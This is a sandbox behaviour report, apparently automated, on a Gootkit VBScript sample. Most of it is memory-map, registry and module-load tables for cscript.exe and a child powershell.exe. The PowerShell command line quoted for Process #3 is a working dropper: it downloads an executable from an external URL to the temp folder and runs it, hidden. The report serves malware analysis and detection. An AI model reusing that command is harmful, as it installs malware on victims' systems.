6ded37a61962a6a6626bd47adb66f5f73742d8d2125cdff1dc3f932d0a8e5d2e (SHA256)
gootkit_vbs-6ded37a6.vir.vbs
VBScript
Created at 2018-12-13 14:00:00
Notifications (2/2)
The overall sleep time of all monitored processes was truncated from "29 minutes, 45 seconds" to "1 minute, 40 seconds" to reveal dormant functionality.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: cscript.exe
92
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\windows\system32\cscript.exe |
| Command Line | "C:\Windows\System32\CScript.exe" "C:\Users\Nd9E1FYi\Desktop\gootkit_vbs-6ded37a6.vir.vbs" |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:00:23, Reason: Analysis Target |
| Unmonitor | End Time: 00:01:07, Reason: Self Terminated |
| Monitor Duration | 00:00:44 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd40 |
| Parent PID | 0x84c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D50
0x
E78
0x
F20
0x
F3C
0x
F74
0x
F88
0x
FA8
0x
FBC
0x
FD0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x00000017eec80000 | 0x17eec80000 | 0x17eed7ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017eee00000 | 0x17eee00000 | 0x17eeffffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef000000 | 0x17ef000000 | 0x17ef0fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef100000 | 0x17ef100000 | 0x17ef1fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef200000 | 0x17ef200000 | 0x17ef2fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef300000 | 0x17ef300000 | 0x17ef3fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef400000 | 0x17ef400000 | 0x17ef4fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef500000 | 0x17ef500000 | 0x17ef5fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef600000 | 0x17ef600000 | 0x17ef6fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000017ef700000 | 0x17ef700000 | 0x17ef7fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000128811e0000 | 0x128811e0000 | 0x128811fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000128811e0000 | 0x128811e0000 | 0x128811effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000128811f0000 | 0x128811f0000 | 0x128811f6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000012881200000 | 0x12881200000 | 0x12881214fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881220000 | 0x12881220000 | 0x12881223fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881230000 | 0x12881230000 | 0x12881230fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000012881240000 | 0x12881240000 | 0x12881241fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x12881250000 | 0x1288130dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000012881310000 | 0x12881310000 | 0x12881316fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000012881320000 | 0x12881320000 | 0x12881321fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881330000 | 0x12881330000 | 0x12881330fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000012881340000 | 0x12881340000 | 0x12881340fff | Private Memory | rw |
|
|
|
- |
| private_0x0000012881350000 | 0x12881350000 | 0x12881350fff | Private Memory | rw |
|
|
|
- |
| cscript.exe | 0x12881360000 | 0x12881368fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000012881370000 | 0x12881370000 | 0x1288146ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x12881470000 | 0x1288154cfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000012881470000 | 0x12881470000 | 0x1288159ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000012881470000 | 0x12881470000 | 0x12881470fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881470000 | 0x12881470000 | 0x1288152bfff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881530000 | 0x12881530000 | 0x12881533fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881540000 | 0x12881540000 | 0x12881540fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881550000 | 0x12881550000 | 0x12881550fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881560000 | 0x12881560000 | 0x1288157cfff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000012881560000 | 0x12881560000 | 0x1288156ffff | Private Memory | rw |
|
|
|
- |
| vbscript.dll | 0x12881570000 | 0x12881581fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000012881590000 | 0x12881590000 | 0x1288159ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000128815a0000 | 0x128815a0000 | 0x128815affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000128815b0000 | 0x128815b0000 | 0x12881737fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012881740000 | 0x12881740000 | 0x128818c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000128818d0000 | 0x128818d0000 | 0x12882ccffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000012882cd0000 | 0x12882cd0000 | 0x128830cafff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x128830d0000 | 0x12883406fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000012883410000 | 0x12883410000 | 0x1288440ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000012883410000 | 0x12883410000 | 0x1288350ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000012883510000 | 0x12883510000 | 0x1288360ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000012883610000 | 0x12883610000 | 0x1288380ffff | Private Memory | rw |
|
|
|
- |
| wshom.ocx | 0x12883810000 | 0x12883822fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000012883830000 | 0x12883830000 | 0x12883830fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x12883840000 | 0x12883843fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000027.db | 0x12883850000 | 0x12883863fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000012883870000 | 0x12883870000 | 0x12883870fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db | 0x12883880000 | 0x128838c4fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x128838d0000 | 0x128838d3fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x128838e0000 | 0x1288396dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000012883970000 | 0x12883970000 | 0x12883970fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000012884410000 | 0x12884410000 | 0x1288442cfff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007df5ff030000 | 0x7df5ff030000 | 0x7ff5ff02ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff6c3460000 | 0x7ff6c3460000 | 0x7ff6c355ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6c3560000 | 0x7ff6c3560000 | 0x7ff6c3582fff | Pagefile Backed Memory | r |
|
|
|
- |
| cscript.exe | 0x7ff6c3d30000 | 0x7ff6c3d5efff | Memory Mapped File | rwx |
|
|
|
- |
| vbscript.dll | 0x7ffbf8e90000 | 0x7ffbf8f28fff | Memory Mapped File | rwx |
|
|
|
- |
| scrrun.dll | 0x7ffbf9eb0000 | 0x7ffbf9ee4fff | Memory Mapped File | rwx |
|
|
|
- |
| wshom.ocx | 0x7ffbfae30000 | 0x7ffbfae58fff | Memory Mapped File | rwx |
|
|
|
- |
| scrobj.dll | 0x7ffbfae60000 | 0x7ffbfaea3fff | Memory Mapped File | rwx |
|
|
|
- |
| wshext.dll | 0x7ffbfbb40000 | 0x7ffbfbb5dfff | Memory Mapped File | rwx |
|
|
|
- |
| wldp.dll | 0x7ffc02db0000 | 0x7ffc02dbbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x7ffc071a0000 | 0x7ffc07357fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffc07370000 | 0x7ffc07379fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7ffc0a0b0000 | 0x7ffc0a0cafff | Memory Mapped File | rwx |
|
|
|
- |
| msisip.dll | 0x7ffc0aaa0000 | 0x7ffc0aaabfff | Memory Mapped File | rwx |
|
|
|
- |
| amsi.dll | 0x7ffc0b3d0000 | 0x7ffc0b3dffff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ffc0bc60000 | 0x7ffc0bfe1fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffc0f200000 | 0x7ffc0f692fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7ffc0fcd0000 | 0x7ffc0fcf1fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc101d0000 | 0x7ffc10355fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc10810000 | 0x7ffc108a5fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc11260000 | 0x7ffc11293fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc115d0000 | 0x7ffc115e6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc116f0000 | 0x7ffc116fafff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc118d0000 | 0x7ffc118fcfff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ffc11ae0000 | 0x7ffc11b78fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc11b80000 | 0x7ffc11ba8fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc11c50000 | 0x7ffc11c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc11c60000 | 0x7ffc11caafff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc11cb0000 | 0x7ffc11cc3fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc11cd0000 | 0x7ffc11cdefff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffc11d00000 | 0x7ffc11ec6fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffc11f60000 | 0x7ffc125a3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc125b0000 | 0x7ffc12664fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc12670000 | 0x7ffc126d9fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc126e0000 | 0x7ffc12722fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7ffc12730000 | 0x7ffc12784fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc12840000 | 0x7ffc12a27fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc12a30000 | 0x7ffc12ad6fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc12ae0000 | 0x7ffc12c39fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffc12c40000 | 0x7ffc1419efff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc141a0000 | 0x7ffc14325fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc145f0000 | 0x7ffc1469cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc14700000 | 0x7ffc1481bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc14820000 | 0x7ffc1485afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffc14860000 | 0x7ffc148b1fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc148c0000 | 0x7ffc14b3cfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffc14bb0000 | 0x7ffc14cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc14d10000 | 0x7ffc14e65fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc152a0000 | 0x7ffc15360fff | Memory Mapped File | rwx |
|
|
|
- |
| coml2.dll | 0x7ffc15410000 | 0x7ffc1547efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc15480000 | 0x7ffc154dafff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc154e0000 | 0x7ffc15586fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc15590000 | 0x7ffc1562cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
COM (4)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | B54F3741-5B07-11CF-A4B0-00AA004A55E8 | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 06290BD1-48AA-11D2-8432-006008C3FBFC | E4D1C9B0-46E8-11D4-A2A6-00104BD35090 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | WScript.Shell | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\Nd9E1FYi\Desktop\gootkit_vbs-6ded37a6.vir.vbs | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi\Desktop\gootkit_vbs-6ded37a6.vir.vbs | type = size |
|
1 | |
| Get Info | - | type = size |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Read | - | size = 117543, size_out = 117543 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 110 |
|
1 |
Registry (27)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\.vbs | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\VBSFile\ScriptEngine | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = Enabled, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = Enabled, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = LogSecuritySuccesses, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = LogSecuritySuccesses, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = TrustPolicy, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = UseWINSAFER, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = TrustPolicy, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = UseWINSAFER, data = 1, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = Timeout, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = DisplayLogo, data = 1, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = Timeout, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = DisplayLogo, data = 49, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\.vbs | data = VBSFile, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\VBSFile\ScriptEngine | data = VBScript, type = REG_SZ |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | powershell | show_window = SW_HIDE |
|
1 |
Module (28)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x7ffc145f0000 |
|
2 | |
| Load | amsi.dll | base_address = 0x7ffc0b3d0000 |
|
1 | |
| Load | WLDP.DLL | base_address = 0x7ffc02db0000 |
|
1 | |
| Load | C:\Windows\system32\advapi32.dll | base_address = 0x7ffc154e0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x7ffc12c40000 |
|
1 | |
| Get Handle | c:\windows\system32\cscript.exe | base_address = 0x7ff6c3d30000 |
|
2 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffc145f0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernelbase.dll | base_address = 0x7ffc12840000 |
|
1 | |
| Get Filename | c:\windows\system32\cscript.exe | process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7ffc14613270 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapSetInformation, address_out = 0x7ffc14617430 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = QueryProtectedPolicy, address_out = 0x7ffc128b02d0 |
|
1 | |
| Get Address | c:\windows\system32\amsi.dll | function = AmsiInitialize, address_out = 0x7ffc0b3d2260 |
|
1 | |
| Get Address | c:\windows\system32\amsi.dll | function = AmsiScanString, address_out = 0x7ffc0b3d26b0 |
|
1 | |
| Get Address | c:\windows\system32\kernelbase.dll | function = ResolveDelayLoadedAPI, address_out = 0x7ffc1289f670 |
|
1 | |
| Get Address | c:\windows\system32\kernelbase.dll | function = ResolveDelayLoadsFromDll, address_out = 0x7ffc12901540 |
|
1 | |
| Get Address | c:\windows\system32\wldp.dll | function = WldpGetLockdownPolicy, address_out = 0x7ffc02db1010 |
|
1 | |
| Get Address | c:\windows\system32\wldp.dll | function = WldpIsClassInApprovedList, address_out = 0x7ffc02db37b0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferIdentifyLevel, address_out = 0x7ffc154eac70 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferComputeTokenFromLevel, address_out = 0x7ffc154f2db0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferCloseLevel, address_out = 0x7ffc154f6290 |
|
1 | |
| Get Address | c:\windows\system32\cscript.exe | function = 1, address_out = 0x7ff6c3d31250 |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = ShellExecuteExW, address_out = 0x7ffc12d46c70 |
|
1 | |
| Create Mapping | C:\Users\Nd9E1FYi\Desktop\gootkit_vbs-6ded37a6.vir.vbs | filename = C:\Users\Nd9E1FYi\Desktop\gootkit_vbs-6ded37a6.vir.vbs, protection = PAGE_READONLY, maximum_size = 117543 |
|
1 | |
| Map | C:\Users\Nd9E1FYi\Desktop\gootkit_vbs-6ded37a6.vir.vbs | process_name = c:\windows\system32\cscript.exe, desired_access = FILE_MAP_READ |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = WSH-Timer, wndproc_parameter = 1273480484720 |
|
1 |
System (12)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = -1 (infinite) |
|
3 | |
| Get Time | type = Ticks, time = 113890 |
|
1 | |
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = System Directory |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Process #3: powershell.exe
2184
3
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $svabjzvv = New-Object -ComObject Msxml2.XMLHTTP; $iadjti = New-Object -ComObject ADODB.Stream; $iyfigisyb = $env:temp + '\SMSvcHost32.exe';$svabjzvv.open('GET', 'http://amd.martatovaglieri.it/upll?26201', $false);$svabjzvv.send(); if($svabjzvv.Status -eq "200"){$iadjti.open();$iadjti.type = 1;$iadjti.write($svabjzvv.responseBody);$iadjti.position = 0;$iadjti.savetofile($iyfigisyb);$iadjti.close();} Start-Process $iyfigisyb; |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:01:04, Reason: Self Terminated |
| Monitor Duration | 00:00:30 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xff8 |
| Parent PID | 0xd40 (c:\windows\system32\cscript.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
FF4
0x
CD4
0x
BF8
0x
CCC
0x
E34
0x
E4C
0x
E54
0x
E58
0x
FA0
0x
2DC
0x
A8C
0x
F50
0x
B6C
0x
B70
0x
EC0
0x
ED4
0x
624
0x
DBC
0x
7F0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000184b200000 | 0x184b200000 | 0x184b3fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000184b400000 | 0x184b400000 | 0x184b47ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000184b480000 | 0x184b480000 | 0x184b4fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000184b500000 | 0x184b500000 | 0x184b57ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000184b580000 | 0x184b580000 | 0x184b5fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000184b600000 | 0x184b600000 | 0x184b67ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000184b680000 | 0x184b680000 | 0x184b6fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000150452d0000 | 0x150452d0000 | 0x150452effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000150452d0000 | 0x150452d0000 | 0x150452dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000150452e0000 | 0x150452e0000 | 0x150452e6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000150452f0000 | 0x150452f0000 | 0x15045304fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000015045310000 | 0x15045310000 | 0x15045313fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000015045320000 | 0x15045320000 | 0x15045320fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000015045330000 | 0x15045330000 | 0x15045331fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x15045340000 | 0x150453fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000015045400000 | 0x15045400000 | 0x15045406fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000015045410000 | 0x15045410000 | 0x15045411fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000015045420000 | 0x15045420000 | 0x15045420fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x15045430000 | 0x15045432fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000015045440000 | 0x15045440000 | 0x15045440fff | Private Memory | rw |
|
|
|
- |
| private_0x0000015045450000 | 0x15045450000 | 0x15045450fff | Private Memory | rw |
|
|
|
- |
| private_0x0000015045460000 | 0x15045460000 | 0x15045466fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000015045470000 | 0x15045470000 | 0x15045470fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000015045480000 | 0x15045480000 | 0x1504548ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000015045490000 | 0x15045490000 | 0x1504549ffff | Private Memory | - |
|
|
|
- |
| private_0x00000150454a0000 | 0x150454a0000 | 0x150454a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000150454b0000 | 0x150454b0000 | 0x150454b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000150454c0000 | 0x150454c0000 | 0x150454cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000150454d0000 | 0x150454d0000 | 0x150455cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000150455d0000 | 0x150455d0000 | 0x150455dffff | Private Memory | rw |
|
|
|
- |
| winnlsres.dll | 0x150455e0000 | 0x150455e4fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0x150455f0000 | 0x150455fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000015045600000 | 0x15045600000 | 0x1504560ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000015045610000 | 0x15045610000 | 0x1504561ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000015045620000 | 0x15045620000 | 0x1504568ffff | Private Memory | rw |
|
|
|
- |
| mscorrc.dll | 0x15045690000 | 0x150456f1fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000015045700000 | 0x15045700000 | 0x15045700fff | Pagefile Backed Memory | rw |
|
|
|
- |
| tzres.dll | 0x15045710000 | 0x15045710fff | Memory Mapped File | rw |
|
|
|
- |
| tzres.dll.mui | 0x15045710000 | 0x15045718fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000015045710000 | 0x15045710000 | 0x1504571ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000015045740000 | 0x15045740000 | 0x1504574ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000015045750000 | 0x15045750000 | 0x150458d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000150458e0000 | 0x150458e0000 | 0x15045a60fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000015045a70000 | 0x15045a70000 | 0x15046e6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000015046e70000 | 0x15046e70000 | 0x15046f72fff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x15046f80000 | 0x1504705cfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000015047060000 | 0x15047060000 | 0x1504706ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000015047070000 | 0x15047070000 | 0x1505f06ffff | Private Memory | rw |
|
